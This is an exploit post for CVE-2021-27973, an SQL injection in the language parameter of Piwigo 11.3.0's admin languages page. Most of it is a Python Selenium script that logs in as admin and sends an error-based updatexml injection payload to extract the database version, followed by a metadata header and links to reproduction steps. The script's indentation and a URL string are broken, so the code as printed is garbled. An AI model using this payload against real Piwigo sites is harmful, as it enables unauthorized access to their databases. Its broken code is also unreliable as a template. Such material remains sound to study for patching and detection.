# Exploit Title: SQL injection in language parameter to admin.php?page=languages.on Piwigo 11.3.0
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"

#enter your login username
username="admin"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"

print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Languages Exploit
time.sleep(5)
browser.get(("
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate
"))

print("The payload for category Languages is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

---------------------------------

# Exploit Title: SQL injection in language parameter to
admin.php?page=languages.on Piwigo 11.3.0
# Date: 04.30.2021s
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://piwigo.org/
# Software Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-27973
# more: https://www.nu11secur1ty.com/2021/04/cve-2021-27973.html